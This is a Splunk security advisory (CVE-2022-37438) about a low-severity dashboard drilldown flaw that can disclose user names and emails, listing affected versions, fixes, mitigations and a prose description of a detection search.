Information disclosure via the dashboard drilldown in Splunk Enterprise

Advisory ID: SVD-2022-0802

CVE ID: CVE-2022-37438

Published: 2022-08-16

Last Update: 2022-08-16

CVSSv3.1 Score: 2.6, Low

CWE: CWE-200

Bug ID: SPL-221531

Description

In Splunk Enterprise versions in the following table, an authenticated user can craft a dashboard that could potentially leak information (for example, username, email, and real name) about Splunk users, when visited by another user through the drilldown component. The vulnerability requires user access to create and share dashboards using Splunk Web.

Solution

For Splunk Enterprise, upgrade versions to 8.1.11, 8.2.7.1, 9.0.1, or higher.

For Splunk Cloud Platform customers, Splunk is actively patching and monitoring Splunk Cloud instances.

Product Status

ProductVersionComponentAffected VersionFix Version
Splunk Enterprise8.1Splunk Web8.1.10 and lower8.1.11
Splunk Enterprise8.2Splunk Web8.2.0 to 8.2.78.2.7.1
Splunk Enterprise9.0Splunk Web9.0.09.0.1
Splunk Cloud PlatformSplunk Web8.2.2203.4 and lower9.0.2205

Mitigations and Workarounds

You can mitigate this vulnerability by configuring permissions for dashboards and the knowledge objects that drive them.

Detections

This search uses REST functionality to query for dashboards with environment variables present in URL options that could potentially leak information about Splunk users. If an analyst sees results from this search we suggest investigating to determine if the disclosure of these environmental variables was intended.

Severity

Splunk rates the severity as Low, 2.6 with the vector CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N. If the Splunk Enterprise instance disabled Splunk Web, it is not impacted and the vulnerability is informational.

Acknowledgments

Eric LaMothe at Splunk